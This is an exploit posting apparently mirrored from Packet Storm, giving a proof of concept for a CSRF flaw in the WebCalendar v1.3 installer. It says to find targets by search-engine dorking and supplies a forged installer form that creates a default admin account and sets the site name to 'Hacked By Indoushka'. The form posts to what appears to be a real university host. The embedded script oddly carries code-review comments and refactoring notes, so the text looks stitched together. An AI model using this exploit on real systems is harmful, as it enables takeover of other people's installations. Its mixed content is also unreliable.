## https://sploitus.com/exploit?id=PACKETSTORM:173935
====================================================================================================================================  
| # Title : WebCalendar v1.3 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |   
| # Vendor : https://github.com/craigk5n/webcalendar/archive/master.zip |   
| # Dork : WebCalendar v1.3 |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or another search engine.  
  
[+] The following HTML code creates a new admin account.  
  
[+] Go to the line 173.  
  
[+] Set the target site link Save changes and apply .   
  
[+] Affected file: install/index.php (the installer form below posts to it and contains no anti-CSRF token field).  
  
[+] http://127.0.0.1/q7.3/admin/settings.php.  
  
[+] save code as poc.html .  
  
[+] <?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  
"DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">  
<head>  
<title>WebCalendar Setup Wizard</title>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />  
<script>  
<!-- <![CDATA[  
// Table of UI message strings keyed by message id. Only 'invalidColor' is
// filled in here, and nothing in the visible script reads it.
// NOTE(review): presumably consumed by ../includes/js/visible.js or other
// wizard pages - confirm. Kept as `var` so the global binding is unchanged.
var xlate = [];
xlate.invalidColor = 'Invalid Color';
  
/**
 * Opens the installer's `index.php?action=phpinfo` view in a pop-up window
 * named `wcTestPHPInfo` (800x600, resizable, with scrollbars).
 *
 * NOTE(review): the action name suggests the target renders phpinfo()
 * output, which discloses server configuration - confirm that the installer
 * restricts this view to an authenticated setup session.
 *
 * @returns {void}
 */
function testPHPInfo() {
  window.open(
    'index.php?action=phpinfo',
    'wcTestPHPInfo',
    'width=800,height=600,resizable=yes,scrollbars=yes'
  );
}
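/**
 * Checks the "Application Settings" form (`document.form_app_settings`) in
 * the browser and submits it when the checks pass.
 *
 * Checks performed:
 *  - if the 'none' (single-user) authentication option is selected, a
 *    single-user login must be entered;
 *  - the server URL must be non-empty and end with '/'.
 *
 * These checks run client-side only. They do nothing against a forged
 * cross-site POST like the one this advisory describes, so the receiving
 * script still has to validate the fields and verify the request's origin
 * (for example with a per-session anti-CSRF token).
 *
 * @param {HTMLFormElement} [form] - Ignored. The original redeclared `form`
 *   and always used `document.form_app_settings`; the page's inline handler
 *   calls `validate()` with no argument. Kept for interface compatibility.
 * @returns {false|undefined} `false` when a check fails (after alerting the
 *   user); `undefined` after the form has been submitted.
 */
function validate(form) {
  const settings = document.form_app_settings;
  const authSelect = settings.form_user_inc;
  const serverUrl = settings.form_server_url;
  let err = '';

  // Locate the 'none' (single-user) option. The index stays 0 when no such
  // option exists, and the last match wins - both as in the original.
  // `let i` fixes the original's undeclared counter, which leaked a global
  // and throws a ReferenceError in strict mode.
  let listid = 0;
  for (let i = 0; i < authSelect.length; i++) {
    if (authSelect.options[i].value === 'none') {
      listid = i;
    }
  }

  // Single-user mode is only valid with a login name.
  if (
    authSelect.options[listid].selected &&
    settings.form_single_user_login.value.length === 0
  ) {
    alert('Error: You must specify a\nSingle-User Login.');
    settings.form_single_user_login.focus();
    return false;
  }

  const url = serverUrl.value;
  if (url === '') {
    err += 'Server URL is required.\n';
    serverUrl.select();
    serverUrl.focus();
  } else if (url.charAt(url.length - 1) !== '/') {
    err += 'Server URL must end with a slash(/).\n';
    serverUrl.select();
    serverUrl.focus();
  }

  if (err !== '') {
    alert('Error:\n\n' + err);
    return false;
  }

  // All client-side checks passed: submit the form.
  settings.submit();
}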
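/**
 * Shows or hides the 'singleuser' row depending on whether the 'none'
 * (single-user) option of the User Authentication select is chosen.
 *
 * Called from `<body onload>` and from the select's `onChange` handler.
 * `makeVisible` / `makeInvisible` are not defined in this script.
 * NOTE(review): presumably they come from ../includes/js/visible.js - confirm.
 *
 * @returns {void}
 */
function auth_handler() {
  const authSelect = document.form_app_settings.form_user_inc;

  // Locate the 'none' option. The index stays 0 when it is absent, and the
  // last match wins - both as in the original. `let i` fixes the original's
  // undeclared counter, which leaked a global and throws in strict mode.
  let listid = 0;
  for (let i = 0; i < authSelect.length; i++) {
    if (authSelect.options[i].value === 'none') {
      listid = i;
    }
  }

  if (authSelect.options[listid].selected) {
    makeVisible('singleuser');
  } else {
    makeInvisible('singleuser');
  }
}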
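/**
 * Adjusts the database-name input of `document.dbform` to the selected
 * database type. For 'sqlite', 'sqlite3' and 'ibase' the field is widened to
 * 65 characters and the `db_name` label asks for a full path; for any other
 * type the field is 20 characters wide with the plain label.
 *
 * Fix: the original compared `$db_type == 'sqlite3'`. `$db_type` is not
 * defined in this script (it looks like a server-side PHP variable left in
 * the JavaScript), so every selection other than 'sqlite' raised a
 * ReferenceError. The selected value is compared instead.
 * NOTE(review): confirm against upstream that this was the intent.
 *
 * @returns {void}
 */
function db_type_handler() {
  const dbForm = document.dbform;
  const selected = dbForm.form_db_type.value;
  const needsPath =
    selected === 'sqlite' || selected === 'sqlite3' || selected === 'ibase';

  dbForm.form_db_database.size = needsPath ? 65 : 20;
  // Both label strings are constants, so no user input reaches innerHTML.
  document.getElementById('db_name').innerHTML = needsPath
    ? 'Database Name: Full Path (no backslashes)'
    : 'Database Name: ';
}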
/**
 * Rejects a database password that contains '#'.
 *
 * Reads `document.dbform.form_db_password`. When the value contains '#', the
 * user is alerted and the field is selected and focused. No other character
 * is checked. This is a browser-side check only.
 *
 * @returns {false|undefined} `false` when the password contains '#';
 *   otherwise `undefined` (there is no explicit success value).
 */
function chkPassword() {
  const passwordField = document.dbform.form_db_password;

  // '#' is the single disallowed character.
  if (!/#/.test(passwordField.value)) {
    return;
  }

  alert('The password contains illegal characters.');
  passwordField.select();
  passwordField.focus();
  return false;
}
//]]> -->  
</script>  
<script src="../includes/js/visible.js"></script>  
<style>  
body {  
margin:0;  
background:#fff;  
font-family:Arial, Helvetica, sans-serif;  
}  
table {  
border:0;  
}  
th.header,  
th.pageheader,  
th.redheader {  
background:#eee;  
}  
th.pageheader {  
padding:10px;  
font-size:18px;  
}  
th.header,  
th.redheader {  
font-size:14px;  
}  
th.redheader,  
.notrecommended {  
color:red;  
}  
td {  
padding:5px;  
}  
td.prompt,  
td.subprompt {  
padding-right:20px;  
font-weight:bold;  
}  
td.subprompt {  
font-size:12px;  
}  
div.nav {  
margin:0;  
border-bottom:1px solid #000;  
}  
div.main {  
margin:10px;  
}  
li {  
margin-top:10px;  
}  
doc.li {  
margin-top:5px;  
}  
.recommended {  
color:green;  
}  
</style>  
</head>  
<body onload="auth_handler();">  
<table border="1" width="90%" class="aligncenter">  
<th class="pageheader" colspan="2">WebCalendar Installation Wizard Step 4</th>  
<tr>  
<td colspan="2" width="50%">This is the final step in setting up your WebCalendar Installation.</td>  
</tr>  
<th class="header" colspan="2">Application Settings</th>  
<tr>  
<td colspan="2">  
<ul><li>HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select 'Web Server' from the 'User Authentication' choices below.</li></ul>  
</td>  
</tr>  
<tr>  
<td>  
<table width="75%" class="aligncenter">  
<tr>  
<form action="http://phase.ups-tlse.fr/webcalendar/install/index.php?action=switch&page=4" method="post" enctype='multipart/form-data' name="form_app_settings">  
<input type="hidden" name="app_settings" value="1" />  
<td class="prompt">Create Default Admin Account:</td>  
<td>  
<input type="checkbox" name="load_admin" value="Yes" />  
<span class="notrecommended"> (Admin Account Not Found)</span>  
</td>  
</tr>  
<tr>  
<td class="prompt">Application Name:</td>  
<td><input type="text" size="40" name="form_application_name" id="form_application_name" value="Hacked By Indoushka" /></td>  
</tr>  
<tr>  
<td class="prompt">Server URL:</td>  
<td><input type="text" size="40" name="form_server_url" id="form_server_url" value="http://phase.ups-tlse.fr/webcalendar/" /></td>  
</tr>  
<tr>  
<td class="prompt">User Authentication:</td>  
<td>  
<select name="form_user_inc" onChange="auth_handler()">  
<option value="user.php" selected="selected">Web-based via WebCalendar (default)</option>  
<option value="http">Web Server (not detected)</option>  
<option value="user-imap.php">IMAP</option>  
<option value="none" >None (Single-User)</option>  
</select>  
</td>  
</tr>  
<tr id="singleuser">  
<td class="prompt">&nbsp;&nbsp;&nbsp;Single-User Login:</td>  
<td><input name="form_single_user_login" size="20" value="" /></td>  
</tr>  
<tr>  
<td class="prompt">Read-Only:</td>  
<td>  
<input name="form_readonly" value="true" type="radio" />Yes&nbsp;&nbsp;&nbsp;&nbsp;  
<input name="form_readonly" value="false" type="radio" checked="checked" />No  
</td>  
</tr>  
<tr>  
<td class="prompt">Environment:</td>  
<td>  
<select name="form_mode">  
<option value="prod" selected="selected">Production</option>  
<option value="dev">Development</option>  
</select>  
</td>  
</tr>  
</table>  
</td>  
</tr>  
</table>  
<table width="80%" class="aligncenter">  
<tr>  
<td class="aligncenter">  
<input name="action" type="button" value="Save Settings" onClick="return validate();" />  
<input type="button" value="Logout" onclick="document.location.href='index.php?action=logout'" />  
</form>  
</td>  
</tr>  
</table> </body>  
</html>  
  
  
Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================